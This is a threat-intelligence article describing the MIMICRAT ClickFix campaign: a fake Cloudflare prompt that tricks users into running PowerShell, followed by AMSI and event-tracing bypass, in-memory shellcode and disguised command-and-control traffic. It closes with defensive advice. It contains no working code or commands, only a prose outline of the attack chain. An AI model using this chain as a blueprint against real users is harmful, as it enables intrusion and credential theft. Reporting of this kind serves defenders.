MIMICRAT: Unveiling the Sophisticated Multi-Stage ClickFix Cyber Threat
A newly identified cyber campaign has emerged, employing a deceptive technique known as ClickFix to distribute a custom remote access trojan (RAT) named MIMICRAT. This operation compromises legitimate websites, serving as delivery vectors and bypassing traditional security controls by leveraging social engineering tactics rather than exploiting software vulnerabilities. MIMICRAT, a versatile native C++ implant, is designed for long-term stealth and persistence, posing a significant risk to global enterprises.
Attack Sequence and Methodology
The attack initiates when a user visits a trusted site, such as a financial tool, that has been silently injected with malicious JavaScript. This script presents a fraudulent Cloudflare verification pop-up, urging the victim to copy and execute a specific PowerShell command to resolve a supposed browser error. By exploiting user trust, this ClickFix tactic effectively circumvents browser-based download protections.
Elastic analysts identified this complex threat in early February 2026, observing its use of five distinct infection stages to successfully evade detection. The researchers highlighted that the campaign targets multiple industries by dynamically localizing lures into 17 different languages, ensuring broad reach across various geographies. They noted that the malware’s modular design allows attackers to adapt their tactics rapidly.
MIMICRAT Capabilities
The final payload, MIMICRAT, is equipped with advanced capabilities, including Windows token theft, file system manipulation, and SOCKS5 tunneling. It maintains persistence while communicating with command-and-control servers using malleable HTTP profiles that blend seamlessly with legitimate web analytics traffic. This sophisticated camouflage makes identification by network defenders exceptionally challenging, as the malicious signals are hidden amidst normal background noise.
Stealthy Infection and Execution
The infection mechanism is engineered to bypass modern defenses through a series of calculated, obfuscated steps. After the initial PowerShell execution, a highly obfuscated second script is downloaded to disable Windows Event Tracing and the Antimalware Scan Interface (AMSI). This critical step blinds security tools, allowing the subsequent stages to operate on the victim’s machine without generating standard alerts.
Following these bypasses, a Lua-based loader is dropped to decrypt and execute the final shellcode entirely within system memory. This fileless approach ensures that MIMICRAT resides only in RAM, significantly reducing its digital footprint and complicating forensic analysis for security teams attempting to trace the intrusion. The use of a custom Lua loader further obscures the attack flow.
Defensive Measures
To defend against this threat, organizations must enhance user training to recognize fake browser verification prompts and avoid pasting unknown commands. Security teams should enforce strict PowerShell execution policies and monitor for obfuscated command lines. Blocking known malicious domains and inspecting network traffic for MIMICRAT’s specific communication patterns is also critical for disrupting the attack chain before data exfiltration occurs.
